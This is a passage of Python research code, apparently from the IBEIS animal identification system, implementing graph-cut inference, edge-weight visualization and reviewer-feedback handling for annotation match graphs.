pad = 1E6
perbprob = (newprob * (1.0 - pad * 2)) + pad
weights = vt.logit(perbprob)
else:
weights = (edge_weights - thresh)
# Conv
weights[np.isnan(edge_weights)] = 0
weights = (weights * int_factor).astype(np.int32)
edges_ = np.round(model.edges).astype(np.int32)
edges_ = vt.atleast_nd(edges_, 2)
edges_.shape = (edges_.shape[0], 2)
weighted_edges = np.vstack((edges_.T, weights)).T
weighted_edges = np.ascontiguousarray(weighted_edges)
weighted_edges = np.nan_to_num(weighted_edges)
# Remove edges with 0 weight as they have no influence
weighted_edges = weighted_edges.compress(weighted_edges.T[2] != 0, axis=0)
# Update internals
model.thresh = thresh
model.weighted_edges = weighted_edges
model.weights = weights
@property
def total_energy(model):
pairwise_potts = model.pairwise_potts
wedges = model.weighted_edges
unary_idxs = (model.labeling,)
pairwise_idxs = (model.labeling[wedges.T[0]],
model.labeling[wedges.T[1]])
_unary_energies = model.unaries[unary_idxs]
_potts_energies = pairwise_potts[pairwise_idxs]
unary_energy = _unary_energies.sum()
pairwise_energy = (wedges.T[2] * _potts_energies).sum()
total_energy = unary_energy + pairwise_energy
return total_energy
@property
def node_to_label(model):
# External nodes to label
nodes = ut.take(model.intern2_extern, range(model.n_nodes))
extern_node2_new_label = dict(zip(nodes, model.labeling))
return extern_node2_new_label
def _estimate_threshold(model, method=None, curve=None):
"""
import plottool as pt
idx3 = vt.find_elbow_point(curve[idx1:idx2 + 1]) + idx1
pt.plot(curve)
pt.plot(idx1, curve[idx1], 'bo')
pt.plot(idx2, curve[idx2], 'ro')
pt.plot(idx3, curve[idx3], 'go')
"""
if curve is None:
isvalid = ~np.isnan(model.edge_weights)
curve = sorted(ut.compress(model.edge_weights, isvalid))
thresh = estimate_threshold(curve, method)
#if len(curve) == 0:
# return 0
#if method is None:
# method = 'mean'
#if method == 'mean':
# thresh = np.mean(curve)
#elif method == 'elbow':
# idx1 = vt.find_elbow_point(curve)
# idx2 = vt.find_elbow_point(curve[idx1:]) + idx1
# thresh = curve[idx2]
#else:
# raise ValueError('method = %r' % (method,))
return thresh
def run_inference(model, thresh=None, n_labels=None, n_iter=5,
algorithm='expansion'):
import pygco
if n_labels is not None:
model._update_labels(n_labels)
if thresh is not None:
model._update_weights(thresh=thresh)
if model.n_labels <= 0:
raise ValueError('cannot run inference with zero labels')
if model.n_labels == 1:
labeling = np.zeros(model.n_nodes, dtype=np.int32)
else:
cutkw = dict(n_iter=n_iter, algorithm=algorithm)
if 0:
print(ut.code_repr(model.unaries, 'unaries'))
print(ut.code_repr(model.weighted_edges, 'weighted_edges'))
print(ut.code_repr(model.pairwise_potts, 'pairwise_potts'))
print(ut.code_repr(cutkw, 'cutkw'))
labeling = pygco.cut_from_graph(model.weighted_edges, model.unaries,
model.pairwise_potts, **cutkw)
model.labeling = labeling
#print('model.total_energy = %r' % (model.total_energy,))
return labeling
def run_inference2(model, min_labels=1, max_labels=10):
cut_params = ut.all_dict_combinations({
#'n_labels': list(range(min_labels, max_labels + 1)),
#'n_labels': list(range(min_labels, max_labels + 1)),
'n_labels': list(range(max_labels, max_labels + 1)),
})
cut_energies = []
cut_labeling = []
for params in cut_params:
model.run_inference(**params)
nrg = model.total_energy
#complexity = .1 * model.n_nodes * model.thresh * params['n_labels']
complexity = 0
nrg2 = nrg + complexity
print('used %d labels' % (len(set(model.labeling))),)
print('complexity = %r' % (complexity,))
print('nrg = %r' % (nrg,))
print('nrg + complexity = %r' % (nrg2,))
cut_energies.append(nrg2)
cut_labeling.append(model.labeling)
best_paramx = np.argmin(cut_energies)
print('best_paramx = %r' % (best_paramx,))
params = cut_params[best_paramx]
print('params = %r' % (params,))
labeling = cut_labeling[best_paramx]
model.labeling = labeling
#labeling = model.run_inference(**params)
return labeling, params
@staticmethod
def weights_as_matrix(weighted_edges):
n_labels = weighted_edges.T[0:2].max() + 1
mat = np.zeros((n_labels, n_labels))
flat_idxs = np.ravel_multi_index(weighted_edges.T[0:2], dims=(n_labels, n_labels))
assert ut.isunique(flat_idxs)
mat.ravel()[flat_idxs] = weighted_edges.T[2]
#mat[tuple(weighted_edges.T[0:2])] = weighted_edges.T[2]
def get_cut_edges(model):
extern_uv_list = np.array(list(model.graph.edges()))
intern_uv_list = ut.unflat_take(model.extern2_intern, extern_uv_list)
intern_uv_list = np.array(intern_uv_list)
u_labels = model.labeling[intern_uv_list.T[0]]
v_labels = model.labeling[intern_uv_list.T[1]]
# Remove edges between all annotations with different labels
cut_edges = extern_uv_list[u_labels != v_labels]
cut_edges = [tuple(uv.tolist()) for uv in cut_edges]
return cut_edges
@six.add_metaclass(ut.ReloadingMetaclass)
class AnnotInferenceVisualization(object):
""" contains plotting related code """
truth_colors = {
'match': pt.TRUE_GREEN,
#'match': pt.TRUE_BLUE,
'nomatch': pt.FALSE_RED,
'notcomp': pt.YELLOW,
'unreviewed': pt.UNKNOWN_PURP
}
def initialize_visual_node_attrs(infr, graph=None):
if infr.verbose:
print('[infr] initialize_visual_node_attrs')
import networkx as nx
#import plottool as pt
if graph is None:
graph = infr.graph
#node_to_aid = infr.node_to_aid
aid_to_node = infr.aid_to_node
#nx.get_node_attrs(graph, 'aid')
#nodes = list(graph.nodes())
aid_list = list(aid_to_node.keys())
annot_nodes = ut.take(aid_to_node, aid_list)
#aid_list = [node_to_aid.get(node, node) for node in nodes]
chip_width = 256
imgpath_list = infr.ibs.depc_annot.get('chips', aid_list, 'img',
config=dict(dim_size=chip_width),
read_extern=False)
nx.set_node_attrs(graph, 'framewidth', 3.0)
#nx.set_node_attrs(graph, 'framecolor', pt.DARK_BLUE)
nx.set_node_attrs(graph, 'shape', _dz(annot_nodes, ['rect']))
nx.set_node_attrs(graph, 'image', _dz(annot_nodes, imgpath_list))
def get_colored_edge_weights(infr, graph=None):
# Update color and linewidth based on scores/weight
if graph is None:
graph = infr.graph
edges = list(infr.graph.edges())
edge2_weight = nx.get_edge_attrs(infr.graph, CUT_WEIGHT_KEY)
#edges = list(edge2_weight.keys())
weights = np.array(ut.dict_take(edge2_weight, edges, np.nan))
nan_idxs = []
if len(weights) > 0:
# give nans threshold value
nan_idxs = np.where(np.isnan(weights))[0]
weights[nan_idxs] = infr.thresh
#weights = weights.compress(is_valid, axis=0)
#edges = ut.compress(edges, is_valid)
colors = infr.get_colored_weights(weights)
#print('!! weights = %r' % (len(weights),))
#print('!! edges = %r' % (len(edges),))
#print('!! colors = %r' % (len(colors),))
if len(nan_idxs) > 0:
import plottool as pt
for idx in nan_idxs:
colors[idx] = pt.GRAY
return edges, weights, colors
def get_colored_weights(infr, weights):
import plottool as pt
#pt.rrrr()
cmap_ = 'viridis'
cmap_ = 'plasma'
#cmap_ = pt.plt.get_cmap(cmap_)
weights[np.isnan(weights)] = infr.thresh
#colors = pt.scores_to_color(weights, cmap_=cmap_, logscale=True)
colors = pt.scores_to_color(weights, cmap_=cmap_, score_range=(0, 1),
logscale=False)
return colors
@property
def visual_edge_attrs(infr):
return ['implicit', 'style', 'tail_lp', 'taillabel', 'label', 'lp',
'headlabel', 'linestyle', 'color', 'stroke', 'lw', 'end_pt',
'start_pt', 'head_lp', 'alpha', 'ctrl_pts', 'pos', 'zorder']
@property
def visual_node_attrs(infr):
return ['color', 'framewidth', 'image', 'label',
'pos', 'shape', 'size', 'height', 'width', 'zorder']
def simplify_graph(infr, graph):
s = graph.copy()
for attr in infr.visual_edge_attrs:
ut.nx_delete_edge_attr(s, attr)
for attr in infr.visual_node_attrs:
ut.nx_delete_node_attr(s, attr)
return s
def update_visual_attrs(infr, graph=None, show_cuts=False,
show_reviewed_cuts=True, only_reviewed=False):
if infr.verbose:
print('[infr] update_visual_attrs')
#edge2_weight = nx.get_edge_attrs(infr.graph, 'score')
if graph is None:
# Hack for name_graph
graph = infr.graph
ut.nx_delete_edge_attr(graph, 'style')
ut.nx_delete_edge_attr(graph, 'implicit')
ut.nx_delete_edge_attr(graph, 'color')
ut.nx_delete_edge_attr(graph, 'lw')
ut.nx_delete_edge_attr(graph, 'stroke')
ut.nx_delete_edge_attr(graph, 'alpha')
ut.nx_delete_edge_attr(graph, 'linestyle')
ut.nx_delete_edge_attr(graph, 'label')
# Set annotation node labels
node_to_aid = nx.get_node_attrs(graph, 'aid')
node_to_nid = nx.get_node_attrs(graph, 'name_label')
annotnode_to_label = {
#node: '%d:aid=%r' % (node, aid)
node: 'aid=%r\nnid=%r' % (aid, node_to_nid[node])
for node, aid in node_to_aid.items()
}
nx.set_node_attributes(graph, 'label', annotnode_to_label)
# Color nodes by name label
ut.color_nodes(graph, labelattr='name_label')
reviewed_states = nx.get_edge_attrs(graph, 'reviewed_state')
SPLIT_MODE = True
if not SPLIT_MODE:
# Update color and linewidth based on scores/weight
edges, edge_weights, edge_colors = infr.get_colored_edge_weights(graph)
#nx.set_edge_attrs(graph, 'len', _dz(edges, [10]))
nx.set_edge_attrs(graph, 'color', _dz(edges, edge_colors))
minlw, maxlw = .5, 4
lw = ((maxlw - minlw) * edge_weights + minlw)
nx.set_edge_attrs(graph, 'lw', _dz(edges, lw))
# Mark reviewed edges witha stroke
edge_to_stroke = {
edge: {'linewidth': 3, 'foreground': infr.truth_colors[state]}
for edge, state in reviewed_states.items()
}
nx.set_edge_attrs(graph, 'stroke', edge_to_stroke)
else:
# Mark reviewed edges witha color
edge_to_color = {
edge: infr.truth_colors[state]
for edge, state in reviewed_states.items()
}
nx.set_edge_attrs(graph, 'color', edge_to_color)
# Mark edges that might be splits with strokes
possible_split_edges = infr.find_possible_binary_splits()
edge_to_stroke = {
edge: {'linewidth': 3, 'foreground': pt.ORANGE}
for edge in ut.unique(possible_split_edges)
}
nx.set_edge_attrs(graph, 'stroke', edge_to_stroke)
# Are cuts visible or invisible?
edge2_cut = nx.get_edge_attrs(graph, 'is_cut')
cut_edges = [edge for edge, cut in edge2_cut.items() if cut]
nx.set_edge_attrs(graph, 'implicit', _dz(cut_edges, [True]))
if infr.verbose:
print('show_cuts = %r' % (show_cuts,))
print('show_reviewed_cuts = %r' % (show_reviewed_cuts,))
nx.set_edge_attrs(graph, 'linestyle', _dz(cut_edges, ['dashed']))
# Non-matching edges should not impose a constraint on the graph layout
nonmatch_edges = {edge: state for edge, state in reviewed_states.items()
if state == 'nomatch'}
nx.set_edge_attrs(graph, 'implicit', _dz(nonmatch_edges, [True]))
if only_reviewed:
# only reviewed edges contribute
edges = list(graph.edges())
unreviewed_edges = ut.setdiff(edges, reviewed_states.keys())
nx.set_edge_attrs(graph, 'implicit', _dz(unreviewed_edges, [True]))
nx.set_edge_attrs(graph, 'style', _dz(unreviewed_edges, ['invis']))
if show_cuts or show_reviewed_cuts:
if not show_cuts:
nonfeedback_cuts = ut.setdiff(cut_edges, reviewed_states.keys())
nx.set_edge_attrs(graph, 'style', _dz(nonfeedback_cuts, ['invis']))
else:
nx.set_edge_attrs(graph, 'style', _dz(cut_edges, ['invis']))
# Make MST edge have more alpha
edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
mst_edges = [edge for edge, flag in edge_to_ismst.items() if flag]
nx.set_edge_attrs(graph, 'alpha', _dz(mst_edges, [.5]))
nodes = list(graph.nodes())
nx.set_node_attributes(graph, 'zorder', _dz(nodes, [10]))
nx.set_edge_attributes(graph, 'zorder', _dz(edges, [0]))
# update the positioning layout
layoutkw = dict(
prog='neato',
#defaultdist=100,
splines='spline',
sep=10 / 72,
#esep=10 / 72
)
pt.nx_agraph_layout(graph, inplace=True, **layoutkw)
def show_graph(infr, use_image=False, only_reviewed=False, show_cuts=False):
infr.update_visual_attrs(only_reviewed=only_reviewed, show_cuts=False)
graph = infr.graph
plotinfo = pt.show_nx(graph, layout='custom', as_directed=False,
modify_ax=False, use_image=use_image, verbose=0)
pt.zoom_factory()
pt.pan_factory(pt.gca())
# Draw a colorbar
xy = (1, infr.thresh)
xytext = (2.5, .3 if infr.thresh < .5 else .7)
_normal_ticks = np.linspace(0, 1, num=11)
_normal_scores = np.linspace(0, 1, num=500)
_normal_colors = infr.get_colored_weights(_normal_scores)
cb = pt.colorbar(_normal_scores, _normal_colors, lbl='weights',
ticklabels=_normal_ticks)
ta = cb.ax.annotate('threshold', xy=xy, xytext=xytext,
arrowprops=dict(
alpha=.5, fc="0.6",
connectionstyle="angle3,angleA=90,angleB=0"),)
#return cb, ta
plotinfo, ta, cb
#return plotinfo
@six.add_metaclass(ut.ReloadingMetaclass)
class AnnotInference(ut.NiceRepr, AnnotInferenceVisualization):
"""
Sandbox class for maintaining state of an identification
CommandLine:
python -m ibeis.viz.viz_graph2 make_qt_graph_interface --show --aids=1,2,3,4,5,6,7
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr()
>>> result = ('infr = %s' % (infr,))
>>> print(result)
infr = <AnnotInference(nAids=6, nEdges=0)>
"""
truth_texts = {
0: 'nomatch',
1: 'match',
2: 'notcomp',
3: 'unreviewed',
}
def __init__(infr, ibs, aids, nids=None, autoinit=False, verbose=False):
infr.verbose = verbose
if infr.verbose:
print('[infr] __init__')
infr.ibs = ibs
infr.aids = aids
if nids is None:
nids = ibs.get_annot_nids(aids)
if ut.isscalar(nids):
nids = [nids] * len(aids)
infr.orig_name_labels = nids
#if current_nids is None:
# current_nids = nids
assert len(aids) == len(nids), 'must correspond'
#assert len(aids) == len(current_nids)
infr.graph = None
infr.user_feedback = ut.ddict(list)
infr.thresh = .5
infr.cm_list = None
infr.qreq_ = None
if autoinit:
infr.initialize_graph()
def augment_name_nodes(infr):
raise NotImplementedError('do not use')
# If we want to represent name nodes in the graph
name_graph = infr.graph.copy()
#infr.qreq_.dnid_list
#infr.qreq_.daid_list
daids = infr.qreq_.daids
dnids = infr.qreq_.get_qreq_annot_nids(daids)
unique_dnids = ut.unique(dnids)
dname_nodes = [('nid', nid) for nid in unique_dnids]
name_graph.add_nodes_from(dname_nodes)
nx.set_node_attributes(name_graph, 'nid', _dz(dname_nodes, unique_dnids))
node_to_nid = nx.get_node_attrs(name_graph, 'nid')
nid_to_node = ut.invert_dict(node_to_nid)
dannot_nodes = ut.take(infr.aid_to_node, daids)
dname_nodes = ut.take(nid_to_node, dnids)
name_graph.add_edges_from(zip(dannot_nodes, dname_nodes))
#graph = infr.graph
graph = name_graph
nx.set_node_attrs(name_graph, 'name_label', node_to_nid)
infr.initialize_visual_node_attrs(graph)
nx.set_node_attrs(graph, 'shape', _dz(dname_nodes, ['circle']))
infr.update_visual_attrs(graph=name_graph, show_cuts=False)
namenode_to_label = {
node: 'nid=%r' % (nid,)
for node, nid in node_to_nid.items()
}
nx.set_node_attributes(name_graph, 'label', namenode_to_label)
pt.show_nx(graph, layout='custom', as_directed=False, modify_ax=False,
use_image=False, verbose=0)
pt.zoom_factory()
pt.pan_factory(pt.gca())
#dannot_nodes = ut.take(infr.aid_to_node, dnids)
pass
@classmethod
def from_qreq_(cls, qreq_, cm_list):
raise NotImplementedError('do not use')
aids = ut.unique(ut.flatten([qreq_.qaids, qreq_.daids]))
nids = qreq_.get_qreq_annot_nids(aids)
ibs = qreq_.ibs
infr = cls(ibs, aids, nids, verbose=False)
infr.cm_list = cm_list
infr.qreq_ = qreq_
return infr
def __nice__(infr):
if infr.graph is None:
return 'nAids=%r, G=None' % (len(infr.aids))
else:
return 'nAids=%r, nEdges=%r' % (len(infr.aids),
infr.graph.number_of_edges())
def reset_feedback(infr):
""" Resets feedback edges to state of the SQL annotmatch table """
if infr.verbose:
print('[infr] reset_feedback')
infr.user_feedback = infr.read_user_feedback()
def remove_feedback(infr):
if infr.verbose:
print('[infr] remove_feedback')
infr.user_feedback = ut.ddict(list)
def connected_compoment_reviewed_subgraphs(infr):
"""
Two kinds of edges are considered in connected compoment analysis: user
reviewed edges, and algorithmally inferred edges. If an inference
algorithm is not run, then user review is all that matters.
"""
graph = infr.graph
# Make a graph where connections do indicate same names
graph2 = graph.copy()
reviewed_states = nx.get_edge_attrs(graph, 'reviewed_state')
#edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
keep_edges = [key for key, val in reviewed_states.items() if val == 'match']
#keep_edges += list(edge_to_ismst.keys())
graph2.remove_edges_from(list(graph2.edges()))
graph2.add_edges_from(keep_edges)
ccs = list(nx.connected_components(graph2))
cc_subgraphs = [graph.subgraph(cc) for cc in ccs]
return cc_subgraphs
def connected_compoment_status(infr):
r"""
Args:
Returns:
tuple: (num_names, num_inconsistent)
CommandLine:
python -m ibeis.algo.hots.graph_iden connected_compoment_status --show
Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> infr.add_feedback(2, 3, 'nomatch')
>>> infr.add_feedback(5, 6, 'nomatch')
>>> infr.add_feedback(1, 2, 'match')
>>> infr.apply_feedback_edges()
>>> status = infr.connected_compoment_status()
>>> print(ut.repr3(status))
"""
cc_subgraphs = infr.connected_compoment_reviewed_subgraphs()
num_names_max = len(cc_subgraphs)
ccx_to_aids = {
ccx: list(nx.get_node_attrs(cc, 'aid').values())
for ccx, cc in enumerate(cc_subgraphs)
}
aid_to_ccx = {
aid: ccx for ccx, aids in ccx_to_aids.items() for aid in aids
}
all_reviewed_states = nx.get_edge_attrs(infr.graph, 'reviewed_state')
separated_ccxs = set([])
inconsistent_ccxs = set([])
for edge, state in all_reviewed_states.items():
if state == 'nomatch':
ccx1 = aid_to_ccx[edge[0]]
ccx2 = aid_to_ccx[edge[1]]
# Determine number of negative matches within a compoment
if ccx1 == ccx2:
inconsistent_ccxs.add(ccx1)
# Determine the number of compoments that should not be joined
if ccx1 > ccx2:
ccx1, ccx2 = ccx2, ccx1
separated_ccxs.add((ccx1, ccx2))
def approx_min_num_components(nodes, negative_edges):
"""
Find minimum number of connected compoments possible
Each edge represents that two nodes must be separated
This code doesn't solve the problem. The problem is NP-complete and
reduces to minimum clique cover (MCC). This might be an
approximation though.
>>> import networkx as nx
>>> nodes = [1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> edges = [(1, 2), (2, 3), (3, 1),
>>> (4, 5), (5, 6), (6, 4),
>>> (7, 8), (8, 9), (9, 7),
>>> (1, 4), (4, 7), (7, 1),
>>> ]
>>> g_pos = nx.Graph()
>>> g_pos.add_edges_from(edges)
>>> import plottool as pt
>>> pt.qt4ensure()
>>> g_neg = nx.complement(g_pos)
>>> pt.show_nx(g_neg)
>>> negative_edges = g_neg.edges()
>>> nodes = [1, 2, 3, 4, 5, 6, 7]
>>> negative_edges = [(1, 2), (2, 3), (4, 5)]
>>> minimum_number_compoments_possible(nodes, negative_edges)
2
"""
num = 0
g_neg = nx.Graph()
g_neg.add_nodes_from(nodes)
g_neg.add_edges_from(negative_edges)
# Collapse all nodes with degree 0
deg0_nodes = [n for n, d in g_neg.degree_iter() if d == 0]
for u, v in ut.itertwo(deg0_nodes):
g_neg = nx.contracted_nodes(g_neg, v, u)
# Initialize unused nodes to be everything
unused = list(g_neg.nodes())
# complement of the graph contains all possible positive edges
g_pos = nx.complement(g_neg)
if False:
from networkx.algorithms.approximation import clique
maxiset, cliques = clique.clique_removal(g_pos)
num = len(cliques)
return num
# Iterate until we have used all nodes
while len(unused) > 0:
# Seed a new "minimum compoment"
num += 1
# Grab a random unused node n1
#idx1 = np.random.randint(0, len(unused))
idx1 = 0
n1 = unused[idx1]
unused.remove(n1)
neigbs = list(g_pos.neighbors(n1))
neigbs = ut.isect(neigbs, unused)
while len(neigbs) > 0:
# Find node n2, that n1 could be connected to
#idx2 = np.random.randint(0, len(neigbs))
idx2 = 0
n2 = neigbs[idx2]
unused.remove(n2)
# Collapse negative information of n1 and n2
g_neg = nx.contracted_nodes(g_neg, n1, n2)
# Compute new possible positive edges
g_pos = nx.complement(g_neg)
# Iterate until n1 has no more possible connections
neigbs = list(g_pos.neighbors(n1))
neigbs = ut.isect(neigbs, unused)
print('num = %r' % (num,))
return num
num_names_min = approx_min_num_components(infr.aids, separated_ccxs)
# pass
#for count, subgraph in enumerate(cc_subgraphs):
# sub_reviewed_states = nx.get_edge_attrs(subgraph, 'reviewed_state')
# inconsistent_edges = [
# edge for edge, val in sub_reviewed_states.items()
# if val == 'nomatch'
# ]
# if len(inconsistent_edges) > 0:
# #print('Inconsistent')
# num_inconsistent += 1
status = dict(
num_names_max=num_names_max,
num_inconsistent=len(inconsistent_ccxs),
num_names_min=num_names_min,
)
return status
def connected_compoment_reviewed_relabel(infr):
if infr.verbose:
print('[infr] connected_compoment_reviewed_relabel')
cc_subgraphs = infr.connected_compoment_reviewed_subgraphs()
num_inconsistent = 0
num_names = len(cc_subgraphs)
for count, subgraph in enumerate(cc_subgraphs):
reviewed_states = nx.get_edge_attrs(subgraph, 'reviewed_state')
inconsistent_edges = [edge for edge, val in reviewed_states.items()
if val == 'nomatch']
if len(inconsistent_edges) > 0:
#print('Inconsistent')
num_inconsistent += 1
nx.set_node_attrs(infr.graph, 'name_label',
_dz(list(subgraph.nodes()), [count]))
# Check for consistency
return num_names, num_inconsistent
def read_user_feedback(infr):
"""
Loads feedback from annotmatch table
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> user_feedback = infr.read_user_feedback()
>>> result =('user_feedback = %s' % (ut.repr2(user_feedback, nl=1),))
>>> print(result)
user_feedback = {
(2, 3): [{'p_match': 1.0, 'p_nomatch': 0.0, 'p_notcomp': 0.0}],
(5, 6): [{'p_match': 1.0, 'p_nomatch': 0.0, 'p_notcomp': 0.0}],
}
"""
if infr.verbose:
print('[infr] read_user_feedback')
ibs = infr.ibs
annots = ibs.annots(infr.aids)
am_rowids, aid_pairs = annots.get_am_rowids_and_pairs()
aids1 = ut.take_column(aid_pairs, 0)
aids2 = ut.take_column(aid_pairs, 1)
# Use tags to infer truth
props = ['SplitCase', 'JoinCase', 'Photobomb']
flags_list = ibs.get_annotmatch_prop(props, am_rowids)
is_split, is_merge, is_pb = flags_list
is_split = np.array(is_split).astype(np.bool)
is_merge = np.array(is_merge).astype(np.bool)
is_pb = np.array(is_pb).astype(np.bool)
# Use explicit truth state to mark truth
truth = np.array(ibs.get_annotmatch_truth(am_rowids))
# Hack, if we didnt set it, it probably means it matched
need_truth = np.array(ut.flag_None_items(truth)).astype(np.bool)
need_aids1 = ut.compress(aids1, need_truth)
need_aids2 = ut.compress(aids2, need_truth)
needed_truth = ibs.get_aidpair_truths(need_aids1, need_aids2)
truth[need_truth] = needed_truth
# Add information from relevant tags
truth = np.array(truth, dtype=np.int)
truth[is_split] = ibs.const.TRUTH_NOT_MATCH
truth[is_pb] = ibs.const.TRUTH_NOT_MATCH
truth[is_merge] = ibs.const.TRUTH_MATCH
p_match = (truth == ibs.const.TRUTH_MATCH).astype(np.float)
p_nomatch = (truth == ibs.const.TRUTH_NOT_MATCH).astype(np.float)
p_notcomp = (truth == ibs.const.TRUTH_UNKNOWN).astype(np.float)
# CHANGE OF FORMAT
user_feedback = ut.ddict(list)
for count, (aid1, aid2) in enumerate(zip(aids1, aids2)):
edge = tuple(sorted([aid1, aid2]))
review = {
'p_match': p_match[count],
'p_nomatch': p_nomatch[count],
'p_notcomp': p_notcomp[count],
}
user_feedback[edge].append(review)
return user_feedback
#@staticmethod
def _pandas_feedback_format(infr, user_feedback):
import pandas as pd
aid_pairs = list(user_feedback.keys())
aids1 = ut.take_column(aid_pairs, 0)
aids2 = ut.take_column(aid_pairs, 1)
ibs = infr.ibs
am_rowids = ibs.get_annotmatch_rowid_from_undirected_superkey(aids1, aids2)
#am_rowids = np.array(ut.replace_nones(am_rowids, np.nan))
probs_ = list(user_feedback.values())
probs = ut.take_column(probs_, -1)
df = pd.DataFrame.from_dict(probs)
df['aid1'] = aids1
df['aid2'] = aids2
df['am_rowid'] = am_rowids
df.set_index('am_rowid')
df.index = pd.Index(am_rowids, name='am_rowid')
#df.index = pd.Index(aid_pairs, name=('aid1', 'aid2'))
return df
def initialize_graph(infr):
if infr.verbose:
print('[infr] initialize_graph')
#infr.graph = graph = nx.DiGraph()
infr.graph = graph = nx.Graph()
graph.add_nodes_from(infr.aids)
node_to_aid = {aid: aid for aid in infr.aids}
infr.node_to_aid = node_to_aid
node_to_nid = {aid: nid for aid, nid in
zip(infr.aids, infr.orig_name_labels)}
assert len(node_to_nid) == len(node_to_aid), '%r - %r' % (
len(node_to_nid), len(node_to_aid))
nx.set_node_attrs(graph, 'aid', node_to_aid)
nx.set_node_attrs(graph, 'name_label', node_to_nid)
nx.set_node_attrs(graph, 'orig_name_label', node_to_nid)
infr.aid_to_node = ut.invert_dict(infr.node_to_aid)
def match_residuals(infr):
""" Returns information about state change of annotmatches """
old_feedback = infr._pandas_feedback_format(infr.read_user_feedback())
new_feedback = infr._pandas_feedback_format(infr.user_feedback)
new_df, old_df = infr._make_residuals(old_feedback, new_feedback)
return new_df, old_df
@staticmethod
def _make_residuals(old_feedback, new_feedback):
"""
Example:
>>> # ENABLE_DOCTEST
>>> import pandas as pd
>>> old_data = [
>>> [1, 0, 0, 100, 101, 1000],
>>> [0, 1, 0, 101, 102, 1001],
>>> [0, 1, 0, 103, 104, 1003],
>>> [1, 0, 0, 101, 104, 1004],
>>> ]
>>> new_data = [
>>> [1, 0, 0, 101, 102, 1001],
>>> [0, 1, 0, 103, 104, 1002],
>>> [0, 1, 0, 101, 104, 1003],
>>> [1, 0, 0, 102, 103, None],
>>> [1, 0, 0, 100, 103, None],
>>> [0, 0, 1, 107, 109, None],
>>> ]
>>> columns = ['p_match', 'p_nomatch', 'p_noncomp', 'aid1', 'aid2', 'am_rowid']
>>> old_feedback = pd.DataFrame(old_data, columns=columns)
>>> new_feedback = pd.DataFrame(new_data, columns=columns)
>>> old_feedback.set_index('am_rowid', inplace=True, drop=False)
>>> new_feedback.set_index('am_rowid', inplace=True, drop=False)
>>> new_df, old_df = AnnotInference._make_residuals(old_feedback, new_feedback)
>>> # post
>>> is_add = np.isnan(new_df['am_rowid'].values)
>>> add_df = new_df.loc[is_add]
>>> add_ams = [2000, 2001, 2002]
>>> new_df.loc[is_add, 'am_rowid'] = add_ams
>>> new_df.set_index('am_rowid', drop=False, inplace=True)
"""
import pandas as pd
existing_ams = new_feedback['am_rowid'][~np.isnan(new_feedback['am_rowid'])]
both_ams = np.intersect1d(old_feedback['am_rowid'], existing_ams).astype(np.int)
all_new_df = new_feedback.loc[both_ams]
all_old_df = old_feedback.loc[both_ams]
is_changed = ~np.all(all_new_df.values == all_old_df.values, axis=1)
new_df_ = all_new_df[is_changed]
add_df = new_feedback.loc[np.isnan(new_feedback['am_rowid'])].copy()
old_df = all_old_df[is_changed]
new_df = pd.concat([new_df_, add_df])
return new_df, old_df
#def add_edges(infr, aid_pairs):
# #attr_dict={}):
# #, attr_dict)
# graph = infr.graph
# graph.add_edges_from(aid_pairs)
def reset_name_labels(infr):
if infr.verbose:
print('[infr] reset_name_labels')
graph = infr.graph
orig_names = nx.get_node_attrs(graph, 'orig_name_label')
nx.set_node_attrs(graph, 'name_label', orig_names)
def lookup_cm(infr, aid1, aid2):
if infr.cm_list is None:
return None, aid1, aid2
aid2_idx = ut.make_index_lookup(
[cm.qaid for cm in infr.cm_list])
try:
idx = aid2_idx[aid1]
cm = infr.cm_list[idx]
except KeyError:
# switch order
aid1, aid2 = aid2, aid1
idx = aid2_idx[aid1]
cm = infr.cm_list[idx]
return cm, aid1, aid2
def remove_name_labels(infr):
if infr.verbose:
print('[infr] remove_name_labels()')
graph = infr.graph
# make distinct names for all nodes
#import utool
#with utool.embed_on_exception_context:
distinct_names = {node: -graph.node[node]['aid'] for node in graph.nodes()}
nx.set_node_attrs(graph, 'name_label', distinct_names)
def remove_mst_edges(infr):
if infr.verbose:
print('[infr] remove_mst_edges')
graph = infr.graph
edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
mst_edges = [edge for edge, flag in edge_to_ismst.items() if flag]
graph.remove_edges_from(mst_edges)
def exec_matching(infr, vsone=False, prog_hook=None):
""" Loads chip matches into the inference structure """
if infr.verbose:
print('[infr] exec_matching')
#from ibeis.algo.hots import graph_iden
ibs = infr.ibs
aid_list = infr.aids
cfgdict = {
'can_match_samename': True,
'K': 3,
'Knorm': 3,
'prescore_method': 'csum',
'score_method': 'csum'
}
# TODO: use current nids
qreq_ = ibs.new_query_request(aid_list, aid_list, cfgdict=cfgdict)
cm_list = qreq_.execute(prog_hook=prog_hook)
infr.cm_list = cm_list
infr.qreq_ = qreq_
def exec_vsone(infr, prog_hook=None):
# Post process ranks_top and bottom vsmany queries with vsone
# Execute vsone queries on the best vsmany results
parent_rowids = list(infr.graph.edges())
# Hack to get around default product of qaids
qreq_ = infr.ibs.depc.new_request('vsone', [], [], cfgdict={})
cm_list = qreq_.execute(parent_rowids=parent_rowids,
prog_hook=prog_hook)
infr.vsone_qreq_ = qreq_
infr.vsone_cm_list_ = cm_list
def get_pairwise_features():
# Extract features from the one-vs-one results
pass
def add_feedback(infr, aid1, aid2, state):
""" External helper """
if infr.verbose:
print('[infr] add_feedback(%r, %r, %r)' % (aid1, aid2, state))
edge = tuple(sorted([aid1, aid2]))
if isinstance(state, dict):
assert 'p_match' in state
assert 'p_nomatch' in state
assert 'p_notcomp' in state
review = state
infr.user_feedback[edge].append(review)
elif state == 'unreviewed':
if edge in infr.user_feedback:
del infr.user_feedback[edge]
else:
review = {
'p_match': 0.0,
'p_nomatch': 0.0,
'p_notcomp': 0.0,
}
if state == 'match':
review['p_match'] = 1.0
elif state == 'nomatch':
review['p_nomatch'] = 1.0
elif state == 'notcomp':
review['p_notcomp'] = 1.0
else:
msg = 'state=%r is unknown' % (state,)
print(msg)
assert state in infr.truth_texts.values(), msg
infr.user_feedback[edge].append(review)
